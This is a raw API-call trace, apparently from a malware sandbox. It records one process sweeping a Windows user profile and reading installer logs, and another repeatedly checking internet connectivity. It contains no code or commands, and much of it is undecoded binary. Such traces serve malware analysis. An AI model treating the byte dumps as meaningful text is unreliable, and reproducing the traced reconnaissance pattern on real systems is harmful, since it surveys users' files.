FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Windows\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:44,278 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\x1a}\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01`\x1a}\xb9\xd5I\xcd\x01`\x1a}\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeSx\x00\x00\x00\x00\x00\x00\x00`\x1a}\xb9\xd5I\xcd\x010\x8c\xf4\xf6\xdf\x91\xcf\x01\x90\xb0{Z\xe0\x91\xcf\x01\x90\xb0{Z\xe0\x91\xcf\x01\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00"\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x00s\x00r\x00C\x00l\x00a\x00s\x00s\x00.\x00d\x00a\x00t\x00a\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x1a}\xb9\xd5I\xcd\x01\xd0\xf7nwX\x94\xcf\x01\x90\x14uwX\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,278 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,278 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,458 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Windows Media\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:44,468 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01@|[\xb9\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeS\x00\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x00.\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:44,468 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,549 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Windows Media\9.0\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:44,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00jc cmjx\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\xf2\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\x00M\x00S\x00D\x00K\x00N\x00S\x00.\x00D\x00T\x00D\x00 hnk\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,549 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,549 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,629 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\History\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:44,629 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01\xc0 \x9a\xbb\xd5I\xcd\x01\x90\x88i\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xb0\xacf5\xf2\x91\xcf\x01\xc0 \x9a\xbb\xd5I\xcd\x01\xc0 \x9a\xbb\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00H\x00E\x00\x00\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x010\xcc\xd7\xf0\xdf\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,629 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,709 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:44,709 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x010\xcc\xd7\xf0\xdf\x91\xcf\x01P\xa5o\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00n\x00g\x00p\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xc0\xb5g\xb9\xd5I\xcd\x01\xf0(@\x89X\x94\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,709 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,789 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\History\History.IE5\MSHist012014062620140627\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:44,789 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xcc\xd7\xf0\xdf\x91\xcf\x010\xcc\xd7\xf0\xdf\x91\xcf\x010\xcc\xd7\xf0\xdf\x91\xcf\x01\x10\xbbi5\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeS\x00\x00\x00\x00\x00\x00\x00\x000\xcc\xd7\xf0\xdf\x91\xcf\x010\xcc\xd7\xf0\xdf\x91\xcf\x01\xa0W\xe92\xf2\x91\xcf\x01\x10\xbbi5\xf2\x91\xcf\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00n\x00d\x00e\x00x\x00.\x00d\x00a\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:44:44,789 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,789 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,789 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,789 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,869 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:44,869 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x10\x8c\x05\x97X\x94\xcf\x01\x10\x8c\x05\x97X\x94\xcf\x01\x10\x8c\x05\x97X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x80\x00\x00\x00\x00\x00\x00\x000\xa6ctX\x94\xcf\x01@\xac\xa6\xa9X\x94\xcf\x01@\xac\xa6\xa9X\x94\xcf\x01@\xac\xa6\xa9X\x94\xcf\x01`\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x009\x00U\x00T\x00B\x00R\x00R\x00~\x001\x00.\x00L\x00O\x00G\x009\x00u\x00t\x00b\x00r\x00R\x00m\x00q\x00b\x00h\x00.\x00l\x00o\x00g\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xb0\x1f\x7f5\xf2\x91\xcf\x01\xc0\xd4\xc05\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,879 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => p\x00\x00\x00\x00\x00\x00\x00\xa0\x15\x85-\xe3\x91\xcf\x01\xa0\x15\x85-\xe3\x91\xcf\x01\xa0\x15\x85-\xe3\x91\xcf\x01\xa0\x15\x85-\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00c\x00h\x00B\x004\x00.\x00t\x00m\x00p\x00p\x00\x00\x00\x00\x00\x00\x00pwb2\xe3\x91\xcf\x01pwb2\xe3\x91\xcf\x01pwb2\xe3\x91\xcf\x01pwb2\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00b\x00c\x00h\x00B\x00C\x00.\x00t\x00m\x00p\x00\x88\x00\x00\x00\x00\x00\x00\x00\xe0\x0eJ9\xe0\x91\xcf\x01@\x9f\xcb3\xf2\x91\xcf\x01@\x9f\xcb3\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:44,879 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_dotNetFx40_Full_setup_decompression_log.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,879 | 504 | NtReadFile |
Buffer => [6/26/2014, 20:37:10] === Logging started: 2014/06/26 20:37:10 ===
[6/26/2014, 20:37:10] Executable: C:\Documents and Settings\TDW\My Documents\Downloads\dotNetFx40_Full_setup.exe v4.0.30319.1
[6/26/2014, 20:37:10] --- logging level: standard ---
[6/26/ FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,889 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:44,889 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_NDP451-KB2858728-x86-x64-AllOS-ENU_decompression_log.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,899 | 504 | NtReadFile |
Buffer => [6/26/2014, 20:23:26] === Logging started: 2014/06/26 20:23:26 ===
[6/26/2014, 20:23:26] Executable: C:\Documents and Settings\TDW\My Documents\Downloads\NDP451-KB2858728-x86-x64-AllOS-ENU.exe v4.5.50938.18408
[6/26/2014, 20:23:26] --- logging level: sta FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,899 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:44,909 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_TMPA2.tmp_decompression_log.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,909 | 504 | NtReadFile |
Buffer => [6/26/2014, 20:38:17] === Logging started: 2014/06/26 20:38:17 ===
[6/26/2014, 20:38:17] Executable: C:\DOCUME~1\TDW\LOCALS~1\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\TMPA2.tmp.exe v4.0.30319.1
[6/26/2014, 20:38:17] --- logging level: standard --- FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,909 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:44,919 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_TMPB2.tmp_decompression_log.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,919 | 504 | NtReadFile |
Buffer => [6/26/2014, 20:38:36] === Logging started: 2014/06/26 20:38:36 ===
[6/26/2014, 20:38:36] Executable: C:\DOCUME~1\TDW\LOCALS~1\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\TMPB2.tmp.exe v4.0.30319.1
[6/26/2014, 20:38:36] --- logging level: standard --- FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,919 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:44,929 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_wcf_CA_smci_20140627_084818_756.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,949 | 504 | NtReadFile |
Buffer => [\x002\x000\x001\x004\x00-\x000\x006\x00-\x002\x007\x00T\x000\x008\x00:\x004\x008\x00:\x001\x008\x00.\x007\x005\x006\x00Z\x00]\x00:\x00 \x00D\x00D\x00S\x00e\x00t\x00_\x00E\x00n\x00t\x00r\x00y\x00:\x00 \x00S\x00e\x00r\x00v\x00i\x00c\x00e\x00M\x00o\x00d\x00e\x00l\x00R\x00e\x00g\x00.\x00e\x00x\x00e\x00
\x00
\x00[\x002\x000\x001\x004\x00-\x000\x006\x00-\x002\x007\x00T\x000\x008\x00:\x004\x008\x00:\x001\x008\x00.\x007\x005\x006\x00Z\x00]\x00:\x00 \x00D\x00D\x00S\x00e\x00t\x00_\x00S\x00t\x00a\x00t\x00u\x00s\x00:\x00 \x00I\x00n\x00s\x00t\x00a\x00l\x00l\x00a\x00t\x00i\x00o\x00n\x00 \x00o\x00p\x00t\x00i\x00o\x00n\x00s\x00:\x00
\x00
\x00[\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:44,969 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:44,979 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_wcf_retCA7F9D.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,009 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:45,009 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:45,009 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x001727f8 | |
| 07:44:45,009 | 1308 | OpenServiceW |
ServiceControlManager => 0x001727f8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x001728c8 | |
| 07:44:45,009 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:45,009 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:45,019 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:45,019 | 504 | NtReadFile |
Buffer => === Verbose logging started: 6/26/2014 20:59:25 Calling process: C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe ===
ServiceModelReg [20:59:27:347]: Warning: Could not detect IIS installation or IIS is disabl FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,039 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:45,059 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\dd_XPS.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,079 | 504 | NtReadFile |
Buffer => [dd_XPS.txt]
0.570: ================================================================================
0.570: 2014/06/26 20:58:34.682 (local)
0.570: c:\a76de2c4e62affc7c30b362c7552c82d\update\update.exe (version 6.2.29.0)
0.580: Hotfix started with follo FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,099 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:45,099 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:45,179 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\InstallHelp\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:45,179 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00 \x1d\x0fw\xe4\x91\xcf\x01 \x1d\x0fw\xe4\x91\xcf\x01 \x1d\x0fw\xe4\x91\xcf\x01 \x1d\x0fw\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x16Rn\xf5S\xcf\x01\x80+\x12w\xe4\x91\xcf\x01\x00\x16Rn\xf5S\xcf\x01\x80+\x12w\xe4\x91\xcf\x01hv\x07\x00\x00\x00\x00\x00\x00\x80\x07\x00\x00\x00\x00\x00 \x00\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x18\x00S\x00E\x00C\x00U\x00R\x00I\x00~\x001\x00.\x00D\x00L\x00L\x00S\x00e\x00c\x00u\x00r\x00i\x00t\x00y\x00S\x00c\x00a\x00n\x00n\x00e\x00r\x003\x002\x00.\x00d\x00l\x00l\x00 |
SUCCESS | 0x00000000 | |
| 07:44:45,179 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:45,179 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:45,260 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\KB2836939v3_10.0.30319\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:45,260 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\x95\xf7\xbe\xe2\x91\xcf\x01\xf0\x95\xf7\xbe\xe2\x91\xcf\x01\xf0\x95\xf7\xbe\xe2\x91\xcf\x01\xf0\x95\xf7\xbe\xe2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:45,260 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:45,260 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\KB2836939v3_20140626_203526806.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,290 | 504 | NtReadFile |
Buffer => \xff\xfe<\x00!\x00D\x00O\x00C\x00T\x00Y\x00P\x00E\x00 \x00h\x00t\x00m\x00l\x00 \x00P\x00U\x00B\x00L\x00I\x00C\x00 \x00"\x00-\x00/\x00/\x00W\x003\x00C\x00/\x00/\x00D\x00T\x00D\x00 \x00X\x00H\x00T\x00M\x00L\x00 \x001\x00.\x001\x00/\x00/\x00E\x00N\x00"\x00 \x00"\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00w\x003\x00.\x00o\x00r\x00g\x00/\x00T\x00R\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00/\x00D\x00T\x00D\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00.\x00d\x00t\x00d\x00"\x00>\x00
\x00
\x00<\x00!\x00-\x00-\x00 \x00T\x00h\x00e\x00 \x00E\x00x\x00t\x00e\x00n\x00d\x00e\x00d\x00 \x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00/\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,620 | 504 | NtReadFile |
Buffer => c\x00l\x00a\x00s\x00s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x005\x00:\x002\x006\x00]\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00R\x00e\x00g\x00K\x00e\x00y\x00V\x00a\x00l\x00u\x00e\x00:\x00 \x00H\x00K\x00E\x00Y\x00_\x00L\x00O\x00C\x00A\x00L\x00_\x00M\x00A\x00C\x00H\x00I\x00N\x00E\x00\\x00S\x00O\x00F\x00T\x00W\x00A\x00R\x00E\x00\\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00\\x00N\x00E\x00T\x00 \x00F\x00r\x00a\x00m\x00e\x00w\x00o\x00r\x00k\x00 \x00S\x00e\x00t\x00u\x00p\x00\\x00N\x00D\x00P\x00\\x00v\x004\x00\\x00F\x00u\x00l\x00l\x00\\x00V\x00e\x00r\x00s\x00i\x00o\x00n\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,640 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:45,640 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_20140626_203713069-MSI_RGB9RAST_x86.msi.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,690 | 504 | NtReadFile |
Buffer => \xff\xfe=\x00=\x00=\x00 \x00V\x00e\x00r\x00b\x00o\x00s\x00e\x00 \x00l\x00o\x00g\x00g\x00i\x00n\x00g\x00 \x00s\x00t\x00a\x00r\x00t\x00e\x00d\x00:\x00 \x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00 \x00 \x002\x000\x00:\x003\x007\x00:\x005\x002\x00 \x00 \x00B\x00u\x00i\x00l\x00d\x00 \x00t\x00y\x00p\x00e\x00:\x00 \x00S\x00H\x00I\x00P\x00 \x00U\x00N\x00I\x00C\x00O\x00D\x00E\x00 \x003\x00.\x000\x001\x00.\x004\x000\x000\x001\x00.\x005\x005\x001\x002\x00 \x00 \x00C\x00a\x00l\x00l\x00i\x00n\x00g\x00 \x00p\x00r\x00o\x00c\x00e\x00s\x00s\x00:\x00 \x00C\x00:\x00\\x000\x00d\x005\x001\x00b\x003\x006\x005\x001\x008\x00b\x006\x009\x003\x002\x006\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:45,820 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:45,820 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:45,820 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
